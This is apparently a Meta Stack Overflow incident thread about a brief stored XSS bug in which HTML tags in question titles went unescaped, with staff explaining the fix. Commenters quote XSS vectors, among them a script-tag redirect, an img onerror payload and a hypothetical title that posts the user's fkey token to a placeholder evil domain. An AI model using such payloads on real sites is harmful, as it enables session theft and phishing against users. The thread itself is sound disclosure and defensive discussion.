# Adding HTML tags or HTML-tag-like to a title, breaks rendering

Tags: bug, status-completed, security

This question cannot be rendered.
[Simple multi-colored textarea based editor](https://stackoverflow.com/q/69005152)

neither on question view, or list view.

[image]

The bug is triggered by adding `<textarea>` or some other tag to the title, as in [this revision](https://stackoverflow.com/revisions/69005152/5), or [this other question](https://stackoverflow.com/posts/69012060/revisions).

Comment: It's not the pagination, it's [that question](https://stackoverflow.com/q/69005152/208273).  It breaks the site.  Which is interesting, because [the preview](https://stackoverflow.com/posts/69005152/edit) looks fine...

Comment: Reproed on chrome

Comment: and firefox on win10

Comment: The problem was that the title contained _<textarea>_; I changed it to _textarea_ which seemed to fix it.

Comment: Similar breakage here https://stackoverflow.com/questions/3558119/are-non-void-self-closing-tags-valid-in-html5
If this is improper HTML escaping it could be pretty serious, no?

Comment: Looks like a serious XSS vulnerability. Have fun [loading a page](https://stackoverflow.com/questions/19897764/script-document-location-href-script-go-to-page-related-questions) having `<script> document.location.href='';</script>` in it.

Comment: The search for "html tag" is my favourite: https://stackoverflow.com/search?q=html+tag

Comment: People are fast! Someone already [tried to take advantage](https://stackoverflow.com/q/69012356/6045800) of that...

Comment: So, when will Stack Overflow be force-invalidating all user sessions after a blatant XSS vulnerability on the front page of one of the most highly viewed websites about development on the internet? Or will this get brushed under the rug?

Comment: @Qix poor rug, so many things already brushed underneath it. Surely it overflows by now.

Comment: @Qix It seems likely that they would be able to check if anyone actually exploited it to do that based on the information in the database.  Though grace period edits might be a problem if they're not recorded in the database.

Comment: @Ryan smart hacker or wanna-be-hacker knowing SO enough would indeed use the grace period to hide their activity, making it impossible to monitor. Unless SO also keep log of all the submitted data as it goes through, which I really doubt.

Comment: @Tomerikoo What was that question intending to do?

Comment: @Anonymous It had a `window.location.href=...` to some website inside a `<script>` in the title. More of a POC than anything harmful

Comment: @Qix-MONICAWASMISTREATED No staff deleted any comments here. Normal comment moderation by the community mods happened, which has never triggered a notification. You can stop the conspiracy mongering.

Comment: @BaummitAugen After the last three years and the deletion of whole conversations during the Monica incident, that trust is entirely lost. It is not a conspiracy, it is fact. Sorry.

Comment: @Tomerikoo a redirect like that can absolutely be made harmful. For example, it could redirect to a phishing site trying to convince people to "log back in" to Stack Overflow.

Answer (score 74, accepted):

The vulnerability has been closed (was related to [turning off smarty-encoding for titles](https://meta.stackexchange.com/q/68844/)) and has been fixed (smarty-encoding is once again turned off network-wide).

The vulnerability was on the network for 44 minutes, from 10:02 GMT (the time that smarty-encoding was pushed to prod) until I deactivated it network-wide via site setting at 10:46 GMT.

I can confirm that only two posts were posted/edited during the vulnerability time-window that included `<script>` tags or other XSS attack vectors, both by the same user, and both were Proof of Concept posts that included `<script>alert('hello world');</script>` in the title. So there were no actual XSS attacks, no user data was compromised, etc.

---

Update from Yaakov (2023-12, after no longer with Stack): [a more complete account of what happened, along with lessons learned](https://www.linkedin.com/pulse/retro-lessons-learned-from-time-i-accidentally-opened-yaakov-ellis-wvuff)

Comment: Will there be a full RCA published? Do you know if any of our user/session credentials have been compromised?

Comment: It's surprising how a <script> XSS worked like that on a website like SO, I hope we can get more information on the incident, to know we are safe on the website, as the simple use of a tag is the most basic xss vector

Comment: @Gordon depends when they turned off "smarty-encoding for titles", whatever this is. Might be matter of minutes, hours, days, or weeks.

Comment: Agreed. Post mortem would be nice. I suppose impact would be trivial to assess by looking at script tags in titles, if any.

Comment: I'll post more details here when I can. Updated already. Follow this post if you want to know more.

Comment: @Yaakov but what about grace period edits? Can you track those too? Smart hacker could: 1) start with innocent title, 2) set malicious title in grace period, 3) collect data, and still in grace period, put back the original title. Can you track such edits?

Comment: There are ways to perform XSS without the use of `<script>`. For example `<img src="" onerror="alert('XSS')">`.

Comment: @Ivar I searched for posts that took advantage of other xss attack vectors as well. Updated the post above to note this.

Comment: Does it matter which posts were _posted or edited_ during this time period? What about displaying (e.g. in search) any of the _existing_ posts? Or is their content somehow cached? [This comment](/q/411177/4642212#comment863552_411177) implies that it’s not.

Comment: What about the grace period?  Did you check that?  Someone could have exploited to avoid detection (and succeeded).

Comment: @SebastianSimon A hacker would have had to somehow predict the future and see that this _would_ become a vulnerability, then post something and somehow prevent it from being deleted until the vulnerability became present...

Comment: @Anonymous They would only have to see that it *might* be a vulnerability. And lots of questions don't get deleted.

Comment: @khelwood How could they tell?

Comment: @Anonymous How could someone tell that a thing *might* happen? Optimism and imagination?

Comment: @khelwood Good point.  But I think a question with the title `<script>$.post("https://someevilwebsite.invalid", {"fkey": StackExchange.options.user.fkey});</script>` would get deleted pretty quickly (due to it obviously not being a real question)...

Comment: @Anonymous But a title like "What does `<script...evil...>` do in this code?" could surely look like a real question.

Comment: @khelwood I suppose so... it'll take a _long_ time to go over each post that looks suspicious on Stack Overflow though.

Comment: Your final claim is not true, there was a link to a question that had a redirect to an external site.

Comment: @Qix-MONICAWASMISTREATED please provide a link to said question then.

Comment: @Qix-MONICAWASMISTREATED If you are talking about https://stackoverflow.com/questions/69012356 , this was posted after the bug was already fixed

Comment: @Anonymous You comment will likely not get deleted. Let’s wait a few years until we accidentally get a similar vulnerability in comments. _Then_, your code will be executed. How do you know the same thing didn’t happen with _existing_ titles in _this_ vulnerability?

Comment: @SebastianSimon It uses a [.invalid domain name](https://en.wikipedia.org/wiki/.invalid) for that reason, but I agree now that there could be a question out there that would exploit this vulnerability.  I've just signed out of my account and signed back in for this reason.

Comment: Are there any plans to implement [CSP](https://en.wikipedia.org/wiki/Content_Security_Policy) in order to prevent XSS attacks in the future? There is already [a feature request from 2016 on Meta SE](https://meta.stackexchange.com/q/287224/288173), but there was no official answer given by SE. (I know the CSP header is already present, but the current policy isn't very complete/secure, [and that's not](https://observatory.mozilla.org/analyze/stackoverflow.com) [just my opinion](https://csp-evaluator.withgoogle.com/?csp=https://stackoverflow.com).)

Answer (score 19):

It appears that it included `script` tags as well. I was able to snap this screenshot at `2021-09-01T10:41:16Z` before it was fixed:

[image: hello world JS alert]

[image: source code view]

Comment: added a screenshot of the source code of the main page when the xss was still active. never mind the selection on the picture. the actual script tag is in line 876